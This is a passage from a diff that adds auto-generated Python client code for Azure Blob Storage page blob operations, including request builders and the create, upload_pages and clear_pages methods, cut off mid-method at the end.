_header_parameters = kwargs.pop("headers", {}) # type: Dict[str, Any] + if range is not None: + _header_parameters['x-ms-range'] = _SERIALIZER.header("range", range, 'str') + if lease_id is not None: + _header_parameters['x-ms-lease-id'] = _SERIALIZER.header("lease_id", lease_id, 'str') + if if_modified_since is not None: + _header_parameters['If-Modified-Since'] = _SERIALIZER.header("if_modified_since", if_modified_since, 'rfc-1123') + if if_unmodified_since is not None: + _header_parameters['If-Unmodified-Since'] = _SERIALIZER.header("if_unmodified_since", if_unmodified_since, 'rfc-1123') + if if_match is not None: + _header_parameters['If-Match'] = _SERIALIZER.header("if_match", if_match, 'str') + if if_none_match is not None: + _header_parameters['If-None-Match'] = _SERIALIZER.header("if_none_match", if_none_match, 'str') + if if_tags is not None: + _header_parameters['x-ms-if-tags'] = _SERIALIZER.header("if_tags", if_tags, 'str') + _header_parameters['x-ms-version'] = _SERIALIZER.header("version", version, 'str') + if request_id_parameter is not None: + _header_parameters['x-ms-client-request-id'] = _SERIALIZER.header("request_id_parameter", request_id_parameter, 'str') + _header_parameters['Accept'] = _SERIALIZER.header("accept", accept, 'str') + + return HttpRequest( + method="GET", + url=_url, + params=_query_parameters, + headers=_header_parameters, + **kwargs + ) + + +def build_get_page_ranges_diff_request( + url, # type: str + **kwargs # type: Any +): + # type: (...) -> HttpRequest + comp = kwargs.pop('comp', "pagelist") # type: str + version = kwargs.pop('version', "2021-04-10") # type: str + snapshot = kwargs.pop('snapshot', None) # type: Optional[str] + timeout = kwargs.pop('timeout', None) # type: Optional[int] + prevsnapshot = kwargs.pop('prevsnapshot', None) # type: Optional[str] + prev_snapshot_url = kwargs.pop('prev_snapshot_url', None) # type: Optional[str] + range = kwargs.pop('range', None) # type: Optional[str] + lease_id = kwargs.pop('lease_id', None) # type: Optional[str] + if_modified_since = kwargs.pop('if_modified_since', None) # type: Optional[datetime.datetime] + if_unmodified_since = kwargs.pop('if_unmodified_since', None) # type: Optional[datetime.datetime] + if_match = kwargs.pop('if_match', None) # type: Optional[str] + if_none_match = kwargs.pop('if_none_match', None) # type: Optional[str] + if_tags = kwargs.pop('if_tags', None) # type: Optional[str] + request_id_parameter = kwargs.pop('request_id_parameter', None) # type: Optional[str] + marker = kwargs.pop('marker', None) # type: Optional[str] + maxresults = kwargs.pop('maxresults', None) # type: Optional[int] + + accept = "application/xml" + # Construct URL + _url = kwargs.pop("template_url", "{url}/{containerName}/{blob}") + path_format_arguments = { + "url": _SERIALIZER.url("url", url, 'str', skip_quote=True), + } + + _url = _format_url_section(_url, **path_format_arguments) + + # Construct parameters + _query_parameters = kwargs.pop("params", {}) # type: Dict[str, Any] + _query_parameters['comp'] = _SERIALIZER.query("comp", comp, 'str') + if snapshot is not None: + _query_parameters['snapshot'] = _SERIALIZER.query("snapshot", snapshot, 'str') + if timeout is not None: + _query_parameters['timeout'] = _SERIALIZER.query("timeout", timeout, 'int', minimum=0) + if prevsnapshot is not None: + _query_parameters['prevsnapshot'] = _SERIALIZER.query("prevsnapshot", prevsnapshot, 'str') + if marker is not None: + _query_parameters['marker'] = _SERIALIZER.query("marker", marker, 'str') + if maxresults is not None: + _query_parameters['maxresults'] = _SERIALIZER.query("maxresults", maxresults, 'int', minimum=1) + + # Construct headers + _header_parameters = kwargs.pop("headers", {}) # type: Dict[str, Any] + if prev_snapshot_url is not None: + _header_parameters['x-ms-previous-snapshot-url'] = _SERIALIZER.header("prev_snapshot_url", prev_snapshot_url, 'str') + if range is not None: + _header_parameters['x-ms-range'] = _SERIALIZER.header("range", range, 'str') + if lease_id is not None: + _header_parameters['x-ms-lease-id'] = _SERIALIZER.header("lease_id", lease_id, 'str') + if if_modified_since is not None: + _header_parameters['If-Modified-Since'] = _SERIALIZER.header("if_modified_since", if_modified_since, 'rfc-1123') + if if_unmodified_since is not None: + _header_parameters['If-Unmodified-Since'] = _SERIALIZER.header("if_unmodified_since", if_unmodified_since, 'rfc-1123') + if if_match is not None: + _header_parameters['If-Match'] = _SERIALIZER.header("if_match", if_match, 'str') + if if_none_match is not None: + _header_parameters['If-None-Match'] = _SERIALIZER.header("if_none_match", if_none_match, 'str') + if if_tags is not None: + _header_parameters['x-ms-if-tags'] = _SERIALIZER.header("if_tags", if_tags, 'str') + _header_parameters['x-ms-version'] = _SERIALIZER.header("version", version, 'str') + if request_id_parameter is not None: + _header_parameters['x-ms-client-request-id'] = _SERIALIZER.header("request_id_parameter", request_id_parameter, 'str') + _header_parameters['Accept'] = _SERIALIZER.header("accept", accept, 'str') + + return HttpRequest( + method="GET", + url=_url, + params=_query_parameters, + headers=_header_parameters, + **kwargs + ) + + +def build_resize_request( + url, # type: str + **kwargs # type: Any +): + # type: (...) -> HttpRequest + comp = kwargs.pop('comp', "properties") # type: str + version = kwargs.pop('version', "2021-04-10") # type: str + blob_content_length = kwargs.pop('blob_content_length') # type: int + timeout = kwargs.pop('timeout', None) # type: Optional[int] + lease_id = kwargs.pop('lease_id', None) # type: Optional[str] + encryption_key = kwargs.pop('encryption_key', None) # type: Optional[str] + encryption_key_sha256 = kwargs.pop('encryption_key_sha256', None) # type: Optional[str] + encryption_algorithm = kwargs.pop('encryption_algorithm', None) # type: Optional[Union[str, "_models.EncryptionAlgorithmType"]] + encryption_scope = kwargs.pop('encryption_scope', None) # type: Optional[str] + if_modified_since = kwargs.pop('if_modified_since', None) # type: Optional[datetime.datetime] + if_unmodified_since = kwargs.pop('if_unmodified_since', None) # type: Optional[datetime.datetime] + if_match = kwargs.pop('if_match', None) # type: Optional[str] + if_none_match = kwargs.pop('if_none_match', None) # type: Optional[str] + if_tags = kwargs.pop('if_tags', None) # type: Optional[str] + request_id_parameter = kwargs.pop('request_id_parameter', None) # type: Optional[str] + + accept = "application/xml" + # Construct URL + _url = kwargs.pop("template_url", "{url}/{containerName}/{blob}") + path_format_arguments = { + "url": _SERIALIZER.url("url", url, 'str', skip_quote=True), + } + + _url = _format_url_section(_url, **path_format_arguments) + + # Construct parameters + _query_parameters = kwargs.pop("params", {}) # type: Dict[str, Any] + _query_parameters['comp'] = _SERIALIZER.query("comp", comp, 'str') + if timeout is not None: + _query_parameters['timeout'] = _SERIALIZER.query("timeout", timeout, 'int', minimum=0) + + # Construct headers + _header_parameters = kwargs.pop("headers", {}) # type: Dict[str, Any] + if lease_id is not None: + _header_parameters['x-ms-lease-id'] = _SERIALIZER.header("lease_id", lease_id, 'str') + if encryption_key is not None: + _header_parameters['x-ms-encryption-key'] = _SERIALIZER.header("encryption_key", encryption_key, 'str') + if encryption_key_sha256 is not None: + _header_parameters['x-ms-encryption-key-sha256'] = _SERIALIZER.header("encryption_key_sha256", encryption_key_sha256, 'str') + if encryption_algorithm is not None: + _header_parameters['x-ms-encryption-algorithm'] = _SERIALIZER.header("encryption_algorithm", encryption_algorithm, 'str') + if encryption_scope is not None: + _header_parameters['x-ms-encryption-scope'] = _SERIALIZER.header("encryption_scope", encryption_scope, 'str') + if if_modified_since is not None: + _header_parameters['If-Modified-Since'] = _SERIALIZER.header("if_modified_since", if_modified_since, 'rfc-1123') + if if_unmodified_since is not None: + _header_parameters['If-Unmodified-Since'] = _SERIALIZER.header("if_unmodified_since", if_unmodified_since, 'rfc-1123') + if if_match is not None: + _header_parameters['If-Match'] = _SERIALIZER.header("if_match", if_match, 'str') + if if_none_match is not None: + _header_parameters['If-None-Match'] = _SERIALIZER.header("if_none_match", if_none_match, 'str') + if if_tags is not None: + _header_parameters['x-ms-if-tags'] = _SERIALIZER.header("if_tags", if_tags, 'str') + _header_parameters['x-ms-blob-content-length'] = _SERIALIZER.header("blob_content_length", blob_content_length, 'long') + _header_parameters['x-ms-version'] = _SERIALIZER.header("version", version, 'str') + if request_id_parameter is not None: + _header_parameters['x-ms-client-request-id'] = _SERIALIZER.header("request_id_parameter", request_id_parameter, 'str') + _header_parameters['Accept'] = _SERIALIZER.header("accept", accept, 'str') + + return HttpRequest( + method="PUT", + url=_url, + params=_query_parameters, + headers=_header_parameters, + **kwargs + ) + + +def build_update_sequence_number_request( + url, # type: str + **kwargs # type: Any +): + # type: (...) -> HttpRequest + comp = kwargs.pop('comp', "properties") # type: str + version = kwargs.pop('version', "2021-04-10") # type: str + sequence_number_action = kwargs.pop('sequence_number_action') # type: Union[str, "_models.SequenceNumberActionType"] + timeout = kwargs.pop('timeout', None) # type: Optional[int] + lease_id = kwargs.pop('lease_id', None) # type: Optional[str] + if_modified_since = kwargs.pop('if_modified_since', None) # type: Optional[datetime.datetime] + if_unmodified_since = kwargs.pop('if_unmodified_since', None) # type: Optional[datetime.datetime] + if_match = kwargs.pop('if_match', None) # type: Optional[str] + if_none_match = kwargs.pop('if_none_match', None) # type: Optional[str] + if_tags = kwargs.pop('if_tags', None) # type: Optional[str] + blob_sequence_number = kwargs.pop('blob_sequence_number', 0) # type: Optional[int] + request_id_parameter = kwargs.pop('request_id_parameter', None) # type: Optional[str] + + accept = "application/xml" + # Construct URL + _url = kwargs.pop("template_url", "{url}/{containerName}/{blob}") + path_format_arguments = { + "url": _SERIALIZER.url("url", url, 'str', skip_quote=True), + } + + _url = _format_url_section(_url, **path_format_arguments) + + # Construct parameters + _query_parameters = kwargs.pop("params", {}) # type: Dict[str, Any] + _query_parameters['comp'] = _SERIALIZER.query("comp", comp, 'str') + if timeout is not None: + _query_parameters['timeout'] = _SERIALIZER.query("timeout", timeout, 'int', minimum=0) + + # Construct headers + _header_parameters = kwargs.pop("headers", {}) # type: Dict[str, Any] + if lease_id is not None: + _header_parameters['x-ms-lease-id'] = _SERIALIZER.header("lease_id", lease_id, 'str') + if if_modified_since is not None: + _header_parameters['If-Modified-Since'] = _SERIALIZER.header("if_modified_since", if_modified_since, 'rfc-1123') + if if_unmodified_since is not None: + _header_parameters['If-Unmodified-Since'] = _SERIALIZER.header("if_unmodified_since", if_unmodified_since, 'rfc-1123') + if if_match is not None: + _header_parameters['If-Match'] = _SERIALIZER.header("if_match", if_match, 'str') + if if_none_match is not None: + _header_parameters['If-None-Match'] = _SERIALIZER.header("if_none_match", if_none_match, 'str') + if if_tags is not None: + _header_parameters['x-ms-if-tags'] = _SERIALIZER.header("if_tags", if_tags, 'str') + _header_parameters['x-ms-sequence-number-action'] = _SERIALIZER.header("sequence_number_action", sequence_number_action, 'str') + if blob_sequence_number is not None: + _header_parameters['x-ms-blob-sequence-number'] = _SERIALIZER.header("blob_sequence_number", blob_sequence_number, 'long') + _header_parameters['x-ms-version'] = _SERIALIZER.header("version", version, 'str') + if request_id_parameter is not None: + _header_parameters['x-ms-client-request-id'] = _SERIALIZER.header("request_id_parameter", request_id_parameter, 'str') + _header_parameters['Accept'] = _SERIALIZER.header("accept", accept, 'str') + + return HttpRequest( + method="PUT", + url=_url, + params=_query_parameters, + headers=_header_parameters, + **kwargs + ) + + +def build_copy_incremental_request( + url, # type: str + **kwargs # type: Any +): + # type: (...) -> HttpRequest + comp = kwargs.pop('comp', "incrementalcopy") # type: str + version = kwargs.pop('version', "2021-04-10") # type: str + copy_source = kwargs.pop('copy_source') # type: str + timeout = kwargs.pop('timeout', None) # type: Optional[int] + if_modified_since = kwargs.pop('if_modified_since', None) # type: Optional[datetime.datetime] + if_unmodified_since = kwargs.pop('if_unmodified_since', None) # type: Optional[datetime.datetime] + if_match = kwargs.pop('if_match', None) # type: Optional[str] + if_none_match = kwargs.pop('if_none_match', None) # type: Optional[str] + if_tags = kwargs.pop('if_tags', None) # type: Optional[str] + request_id_parameter = kwargs.pop('request_id_parameter', None) # type: Optional[str] + + accept = "application/xml" + # Construct URL + _url = kwargs.pop("template_url", "{url}/{containerName}/{blob}") + path_format_arguments = { + "url": _SERIALIZER.url("url", url, 'str', skip_quote=True), + } + + _url = _format_url_section(_url, **path_format_arguments) + + # Construct parameters + _query_parameters = kwargs.pop("params", {}) # type: Dict[str, Any] + _query_parameters['comp'] = _SERIALIZER.query("comp", comp, 'str') + if timeout is not None: + _query_parameters['timeout'] = _SERIALIZER.query("timeout", timeout, 'int', minimum=0) + + # Construct headers + _header_parameters = kwargs.pop("headers", {}) # type: Dict[str, Any] + if if_modified_since is not None: + _header_parameters['If-Modified-Since'] = _SERIALIZER.header("if_modified_since", if_modified_since, 'rfc-1123') + if if_unmodified_since is not None: + _header_parameters['If-Unmodified-Since'] = _SERIALIZER.header("if_unmodified_since", if_unmodified_since, 'rfc-1123') + if if_match is not None: + _header_parameters['If-Match'] = _SERIALIZER.header("if_match", if_match, 'str') + if if_none_match is not None: + _header_parameters['If-None-Match'] = _SERIALIZER.header("if_none_match", if_none_match, 'str') + if if_tags is not None: + _header_parameters['x-ms-if-tags'] = _SERIALIZER.header("if_tags", if_tags, 'str') + _header_parameters['x-ms-copy-source'] = _SERIALIZER.header("copy_source", copy_source, 'str') + _header_parameters['x-ms-version'] = _SERIALIZER.header("version", version, 'str') + if request_id_parameter is not None: + _header_parameters['x-ms-client-request-id'] = _SERIALIZER.header("request_id_parameter", request_id_parameter, 'str') + _header_parameters['Accept'] = _SERIALIZER.header("accept", accept, 'str') + + return HttpRequest( + method="PUT", + url=_url, + params=_query_parameters, + headers=_header_parameters, + **kwargs + ) + +# fmt: on +class PageBlobOperations(object): + """ + .. warning:: + **DO NOT** instantiate this class directly. + + Instead, you should access the following operations through + :class:`~azure.storage.blob.AzureBlobStorage`'s + :attr:`page_blob` attribute. + """ + + models = _models + + def __init__(self, *args, **kwargs): + args = list(args) + self._client = args.pop(0) if args else kwargs.pop("client") + self._config = args.pop(0) if args else kwargs.pop("config") + self._serialize = args.pop(0) if args else kwargs.pop("serializer") + self._deserialize = args.pop(0) if args else kwargs.pop("deserializer") + + + @distributed_trace + def create( # pylint: disable=inconsistent-return-statements + self, + content_length, # type: int + blob_content_length, # type: int + timeout=None, # type: Optional[int] + tier=None, # type: Optional[Union[str, "_models.PremiumPageBlobAccessTier"]] + metadata=None, # type: Optional[Dict[str, str]] + blob_sequence_number=0, # type: Optional[int] + request_id_parameter=None, # type: Optional[str] + blob_tags_string=None, # type: Optional[str] + immutability_policy_expiry=None, # type: Optional[datetime.datetime] + immutability_policy_mode=None, # type: Optional[Union[str, "_models.BlobImmutabilityPolicyMode"]] + legal_hold=None, # type: Optional[bool] + blob_http_headers=None, # type: Optional["_models.BlobHTTPHeaders"] + lease_access_conditions=None, # type: Optional["_models.LeaseAccessConditions"] + cpk_info=None, # type: Optional["_models.CpkInfo"] + cpk_scope_info=None, # type: Optional["_models.CpkScopeInfo"] + modified_access_conditions=None, # type: Optional["_models.ModifiedAccessConditions"] + **kwargs # type: Any + ): + # type: (...) -> None + """The Create operation creates a new page blob. + + :param content_length: The length of the request. + :type content_length: long + :param blob_content_length: This header specifies the maximum size for the page blob, up to 1 + TB. The page blob size must be aligned to a 512-byte boundary. + :type blob_content_length: long + :param timeout: The timeout parameter is expressed in seconds. For more information, see + :code:`Setting + Timeouts for Blob Service Operations.`. Default value is None. + :type timeout: int + :param tier: Optional. Indicates the tier to be set on the page blob. Default value is None. + :type tier: str or ~azure.storage.blob.models.PremiumPageBlobAccessTier + :param metadata: Optional. Specifies a user-defined name-value pair associated with the blob. + If no name-value pairs are specified, the operation will copy the metadata from the source blob + or file to the destination blob. If one or more name-value pairs are specified, the destination + blob is created with the specified metadata, and metadata is not copied from the source blob or + file. Note that beginning with version 2009-09-19, metadata names must adhere to the naming + rules for C# identifiers. See Naming and Referencing Containers, Blobs, and Metadata for more + information. Default value is None. + :type metadata: dict[str, str] + :param blob_sequence_number: Set for page blobs only. The sequence number is a user-controlled + value that you can use to track requests. The value of the sequence number must be between 0 + and 2^63 - 1. Default value is 0. + :type blob_sequence_number: long + :param request_id_parameter: Provides a client-generated, opaque value with a 1 KB character + limit that is recorded in the analytics logs when storage analytics logging is enabled. Default + value is None. + :type request_id_parameter: str + :param blob_tags_string: Optional. Used to set blob tags in various blob operations. Default + value is None. + :type blob_tags_string: str + :param immutability_policy_expiry: Specifies the date time when the blobs immutability policy + is set to expire. Default value is None. + :type immutability_policy_expiry: ~datetime.datetime + :param immutability_policy_mode: Specifies the immutability policy mode to set on the blob. + Default value is None. + :type immutability_policy_mode: str or ~azure.storage.blob.models.BlobImmutabilityPolicyMode + :param legal_hold: Specified if a legal hold should be set on the blob. Default value is None. + :type legal_hold: bool + :param blob_http_headers: Parameter group. Default value is None. + :type blob_http_headers: ~azure.storage.blob.models.BlobHTTPHeaders + :param lease_access_conditions: Parameter group. Default value is None. + :type lease_access_conditions: ~azure.storage.blob.models.LeaseAccessConditions + :param cpk_info: Parameter group. Default value is None. + :type cpk_info: ~azure.storage.blob.models.CpkInfo + :param cpk_scope_info: Parameter group. Default value is None. + :type cpk_scope_info: ~azure.storage.blob.models.CpkScopeInfo + :param modified_access_conditions: Parameter group. Default value is None. + :type modified_access_conditions: ~azure.storage.blob.models.ModifiedAccessConditions + :keyword blob_type: Specifies the type of blob to create: block blob, page blob, or append + blob. Default value is "PageBlob". Note that overriding this default value may result in + unsupported behavior. + :paramtype blob_type: str + :keyword callable cls: A custom type or function that will be passed the direct response + :return: None, or the result of cls(response) + :rtype: None + :raises: ~azure.core.exceptions.HttpResponseError + """ + cls = kwargs.pop('cls', None) # type: ClsType[None] + error_map = { + 401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError + } + error_map.update(kwargs.pop('error_map', {})) + + blob_type = kwargs.pop('blob_type', "PageBlob") # type: str + + _blob_content_type = None + _blob_content_encoding = None + _blob_content_language = None + _blob_content_md5 = None + _blob_cache_control = None + _lease_id = None + _blob_content_disposition = None + _encryption_key = None + _encryption_key_sha256 = None + _encryption_algorithm = None + _encryption_scope = None + _if_modified_since = None + _if_unmodified_since = None + _if_match = None + _if_none_match = None + _if_tags = None + if blob_http_headers is not None: + _blob_content_type = blob_http_headers.blob_content_type + _blob_content_encoding = blob_http_headers.blob_content_encoding + _blob_content_language = blob_http_headers.blob_content_language + _blob_content_md5 = blob_http_headers.blob_content_md5 + _blob_cache_control = blob_http_headers.blob_cache_control + if lease_access_conditions is not None: + _lease_id = lease_access_conditions.lease_id + if blob_http_headers is not None: + _blob_content_disposition = blob_http_headers.blob_content_disposition + if cpk_info is not None: + _encryption_key = cpk_info.encryption_key + _encryption_key_sha256 = cpk_info.encryption_key_sha256 + _encryption_algorithm = cpk_info.encryption_algorithm + if cpk_scope_info is not None: + _encryption_scope = cpk_scope_info.encryption_scope + if modified_access_conditions is not None: + _if_modified_since = modified_access_conditions.if_modified_since + _if_unmodified_since = modified_access_conditions.if_unmodified_since + _if_match = modified_access_conditions.if_match + _if_none_match = modified_access_conditions.if_none_match + _if_tags = modified_access_conditions.if_tags + + request = build_create_request( + url=self._config.url, + blob_type=blob_type, + version=self._config.version, + content_length=content_length, + blob_content_length=blob_content_length, + timeout=timeout, + tier=tier, + blob_content_type=_blob_content_type, + blob_content_encoding=_blob_content_encoding, + blob_content_language=_blob_content_language, + blob_content_md5=_blob_content_md5, + blob_cache_control=_blob_cache_control, + metadata=metadata, + lease_id=_lease_id, + blob_content_disposition=_blob_content_disposition, + encryption_key=_encryption_key, + encryption_key_sha256=_encryption_key_sha256, + encryption_algorithm=_encryption_algorithm, + encryption_scope=_encryption_scope, + if_modified_since=_if_modified_since, + if_unmodified_since=_if_unmodified_since, + if_match=_if_match, + if_none_match=_if_none_match, + if_tags=_if_tags, + blob_sequence_number=blob_sequence_number, + request_id_parameter=request_id_parameter, + blob_tags_string=blob_tags_string, + immutability_policy_expiry=immutability_policy_expiry, + immutability_policy_mode=immutability_policy_mode, + legal_hold=legal_hold, + template_url=self.create.metadata['url'], + ) + request = _convert_request(request) + request.url = self._client.format_url(request.url) + + pipeline_response = self._client._pipeline.run( # pylint: disable=protected-access + request, + stream=False, + **kwargs + ) + response = pipeline_response.http_response + + if response.status_code not in [201]: + map_error(status_code=response.status_code, response=response, error_map=error_map) + error = self._deserialize.failsafe_deserialize(_models.StorageError, pipeline_response) + raise HttpResponseError(response=response, model=error) + + response_headers = {} + response_headers['ETag']=self._deserialize('str', response.headers.get('ETag')) + response_headers['Last-Modified']=self._deserialize('rfc-1123', response.headers.get('Last-Modified')) + response_headers['Content-MD5']=self._deserialize('bytearray', response.headers.get('Content-MD5')) + response_headers['x-ms-client-request-id']=self._deserialize('str', response.headers.get('x-ms-client-request-id')) + response_headers['x-ms-request-id']=self._deserialize('str', response.headers.get('x-ms-request-id')) + response_headers['x-ms-version']=self._deserialize('str', response.headers.get('x-ms-version')) + response_headers['x-ms-version-id']=self._deserialize('str', response.headers.get('x-ms-version-id')) + response_headers['Date']=self._deserialize('rfc-1123', response.headers.get('Date')) + response_headers['x-ms-request-server-encrypted']=self._deserialize('bool', response.headers.get('x-ms-request-server-encrypted')) + response_headers['x-ms-encryption-key-sha256']=self._deserialize('str', response.headers.get('x-ms-encryption-key-sha256')) + response_headers['x-ms-encryption-scope']=self._deserialize('str', response.headers.get('x-ms-encryption-scope')) + + + if cls: + return cls(pipeline_response, None, response_headers) + + create.metadata = {'url': "{url}/{containerName}/{blob}"} # type: ignore + + + @distributed_trace + def upload_pages( # pylint: disable=inconsistent-return-statements + self, + content_length, # type: int + body, # type: IO + transactional_content_md5=None, # type: Optional[bytearray] + transactional_content_crc64=None, # type: Optional[bytearray] + timeout=None, # type: Optional[int] + range=None, # type: Optional[str] + request_id_parameter=None, # type: Optional[str] + lease_access_conditions=None, # type: Optional["_models.LeaseAccessConditions"] + cpk_info=None, # type: Optional["_models.CpkInfo"] + cpk_scope_info=None, # type: Optional["_models.CpkScopeInfo"] + sequence_number_access_conditions=None, # type: Optional["_models.SequenceNumberAccessConditions"] + modified_access_conditions=None, # type: Optional["_models.ModifiedAccessConditions"] + **kwargs # type: Any + ): + # type: (...) -> None + """The Upload Pages operation writes a range of pages to a page blob. + + :param content_length: The length of the request. + :type content_length: long + :param body: Initial data. + :type body: IO + :param transactional_content_md5: Specify the transactional md5 for the body, to be validated + by the service. Default value is None. + :type transactional_content_md5: bytearray + :param transactional_content_crc64: Specify the transactional crc64 for the body, to be + validated by the service. Default value is None. + :type transactional_content_crc64: bytearray + :param timeout: The timeout parameter is expressed in seconds. For more information, see + :code:`Setting + Timeouts for Blob Service Operations.`. Default value is None. + :type timeout: int + :param range: Return only the bytes of the blob in the specified range. Default value is None. + :type range: str + :param request_id_parameter: Provides a client-generated, opaque value with a 1 KB character + limit that is recorded in the analytics logs when storage analytics logging is enabled. Default + value is None. + :type request_id_parameter: str + :param lease_access_conditions: Parameter group. Default value is None. + :type lease_access_conditions: ~azure.storage.blob.models.LeaseAccessConditions + :param cpk_info: Parameter group. Default value is None. + :type cpk_info: ~azure.storage.blob.models.CpkInfo + :param cpk_scope_info: Parameter group. Default value is None. + :type cpk_scope_info: ~azure.storage.blob.models.CpkScopeInfo + :param sequence_number_access_conditions: Parameter group. Default value is None. + :type sequence_number_access_conditions: + ~azure.storage.blob.models.SequenceNumberAccessConditions + :param modified_access_conditions: Parameter group. Default value is None. + :type modified_access_conditions: ~azure.storage.blob.models.ModifiedAccessConditions + :keyword comp: comp. Default value is "page". Note that overriding this default value may + result in unsupported behavior. + :paramtype comp: str + :keyword page_write: Required. You may specify one of the following options: + + + * Update: Writes the bytes specified by the request body into the specified range. The Range + and Content-Length headers must match to perform the update. + * Clear: Clears the specified range and releases the space used in storage for that range. To + clear a range, set the Content-Length header to zero, and the Range header to a value that + indicates the range to clear, up to maximum blob size. Default value is "update". Note that + overriding this default value may result in unsupported behavior. + :paramtype page_write: str + :keyword callable cls: A custom type or function that will be passed the direct response + :return: None, or the result of cls(response) + :rtype: None + :raises: ~azure.core.exceptions.HttpResponseError + """ + cls = kwargs.pop('cls', None) # type: ClsType[None] + error_map = { + 401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError + } + error_map.update(kwargs.pop('error_map', {})) + + comp = kwargs.pop('comp', "page") # type: str + page_write = kwargs.pop('page_write', "update") # type: str + content_type = kwargs.pop('content_type', "application/octet-stream") # type: Optional[str] + + _lease_id = None + _encryption_key = None + _encryption_key_sha256 = None + _encryption_algorithm = None + _encryption_scope = None + _if_sequence_number_less_than_or_equal_to = None + _if_sequence_number_less_than = None + _if_sequence_number_equal_to = None + _if_modified_since = None + _if_unmodified_since = None + _if_match = None + _if_none_match = None + _if_tags = None + if lease_access_conditions is not None: + _lease_id = lease_access_conditions.lease_id + if cpk_info is not None: + _encryption_key = cpk_info.encryption_key + _encryption_key_sha256 = cpk_info.encryption_key_sha256 + _encryption_algorithm = cpk_info.encryption_algorithm + if cpk_scope_info is not None: + _encryption_scope = cpk_scope_info.encryption_scope + if sequence_number_access_conditions is not None: + _if_sequence_number_less_than_or_equal_to = sequence_number_access_conditions.if_sequence_number_less_than_or_equal_to + _if_sequence_number_less_than = sequence_number_access_conditions.if_sequence_number_less_than + _if_sequence_number_equal_to = sequence_number_access_conditions.if_sequence_number_equal_to + if modified_access_conditions is not None: + _if_modified_since = modified_access_conditions.if_modified_since + _if_unmodified_since = modified_access_conditions.if_unmodified_since + _if_match = modified_access_conditions.if_match + _if_none_match = modified_access_conditions.if_none_match + _if_tags = modified_access_conditions.if_tags + _content = body + + request = build_upload_pages_request( + url=self._config.url, + comp=comp, + page_write=page_write, + version=self._config.version, + content_type=content_type, + content=_content, + content_length=content_length, + transactional_content_md5=transactional_content_md5, + transactional_content_crc64=transactional_content_crc64, + timeout=timeout, + range=range, + lease_id=_lease_id, + encryption_key=_encryption_key, + encryption_key_sha256=_encryption_key_sha256, + encryption_algorithm=_encryption_algorithm, + encryption_scope=_encryption_scope, + if_sequence_number_less_than_or_equal_to=_if_sequence_number_less_than_or_equal_to, + if_sequence_number_less_than=_if_sequence_number_less_than, + if_sequence_number_equal_to=_if_sequence_number_equal_to, + if_modified_since=_if_modified_since, + if_unmodified_since=_if_unmodified_since, + if_match=_if_match, + if_none_match=_if_none_match, + if_tags=_if_tags, + request_id_parameter=request_id_parameter, + template_url=self.upload_pages.metadata['url'], + ) + request = _convert_request(request) + request.url = self._client.format_url(request.url) + + pipeline_response = self._client._pipeline.run( # pylint: disable=protected-access + request, + stream=False, + **kwargs + ) + response = pipeline_response.http_response + + if response.status_code not in [201]: + map_error(status_code=response.status_code, response=response, error_map=error_map) + error = self._deserialize.failsafe_deserialize(_models.StorageError, pipeline_response) + raise HttpResponseError(response=response, model=error) + + response_headers = {} + response_headers['ETag']=self._deserialize('str', response.headers.get('ETag')) + response_headers['Last-Modified']=self._deserialize('rfc-1123', response.headers.get('Last-Modified')) + response_headers['Content-MD5']=self._deserialize('bytearray', response.headers.get('Content-MD5')) + response_headers['x-ms-content-crc64']=self._deserialize('bytearray', response.headers.get('x-ms-content-crc64')) + response_headers['x-ms-blob-sequence-number']=self._deserialize('long', response.headers.get('x-ms-blob-sequence-number')) + response_headers['x-ms-client-request-id']=self._deserialize('str', response.headers.get('x-ms-client-request-id')) + response_headers['x-ms-request-id']=self._deserialize('str', response.headers.get('x-ms-request-id')) + response_headers['x-ms-version']=self._deserialize('str', response.headers.get('x-ms-version')) + response_headers['Date']=self._deserialize('rfc-1123', response.headers.get('Date')) + response_headers['x-ms-request-server-encrypted']=self._deserialize('bool', response.headers.get('x-ms-request-server-encrypted')) + response_headers['x-ms-encryption-key-sha256']=self._deserialize('str', response.headers.get('x-ms-encryption-key-sha256')) + response_headers['x-ms-encryption-scope']=self._deserialize('str', response.headers.get('x-ms-encryption-scope')) + + + if cls: + return cls(pipeline_response, None, response_headers) + + upload_pages.metadata = {'url': "{url}/{containerName}/{blob}"} # type: ignore + + + @distributed_trace + def clear_pages( # pylint: disable=inconsistent-return-statements + self, + content_length, # type: int + timeout=None, # type: Optional[int] + range=None, # type: Optional[str] + request_id_parameter=None, # type: Optional[str] + lease_access_conditions=None, # type: Optional["_models.LeaseAccessConditions"] + cpk_info=None, # type: Optional["_models.CpkInfo"] + cpk_scope_info=None, # type: Optional["_models.CpkScopeInfo"] + sequence_number_access_conditions=None, # type: Optional["_models.SequenceNumberAccessConditions"] + modified_access_conditions=None, # type: Optional["_models.ModifiedAccessConditions"] + **kwargs # type: Any + ): + # type: (...) -> None + """The Clear Pages operation clears a set of pages from a page blob. + + :param content_length: The length of the request. + :type content_length: long + :param timeout: The timeout parameter is expressed in seconds. For more information, see + :code:`Setting + Timeouts for Blob Service Operations.`. Default value is None. + :type timeout: int + :param range: Return only the bytes of the blob in the specified range. Default value is None. + :type range: str + :param request_id_parameter: Provides a client-generated, opaque value with a 1 KB character + limit that is recorded in the analytics logs when storage analytics logging is enabled. Default + value is None. + :type request_id_parameter: str + :param lease_access_conditions: Parameter group. Default value is None. + :type lease_access_conditions: ~azure.storage.blob.models.LeaseAccessConditions + :param cpk_info: Parameter group. Default value is None. + :type cpk_info: ~azure.storage.blob.models.CpkInfo + :param cpk_scope_info: Parameter group. Default value is None. + :type cpk_scope_info: ~azure.storage.blob.models.CpkScopeInfo + :param sequence_number_access_conditions: Parameter group. Default value is None. + :type sequence_number_access_conditions: + ~azure.storage.blob.models.SequenceNumberAccessConditions + :param modified_access_conditions: Parameter group. Default value is None. + :type modified_access_conditions: ~azure.storage.blob.models.ModifiedAccessConditions + :keyword comp: comp. Default value is "page". Note that overriding this default value may + result in unsupported behavior. + :paramtype comp: str + :keyword page_write: Required. You may specify one of the following options: + + + * Update: Writes the bytes specified by the request body into the specified range. The Range + and Content-Length headers must match to perform the update. + * Clear: Clears the specified range and releases the space used in storage for that range. To + clear a range, set the Content-Length header to zero, and the Range header to a value that + indicates the range to clear, up to maximum blob size. Default value is "clear". Note that + overriding this default value may result in unsupported behavior. + :paramtype page_write: str + :keyword callable cls: A custom type or function that will be passed the direct response + :return: None, or the result of cls(response) + :rtype: None + :raises: ~azure.core.exceptions.HttpResponseError + """ + cls = 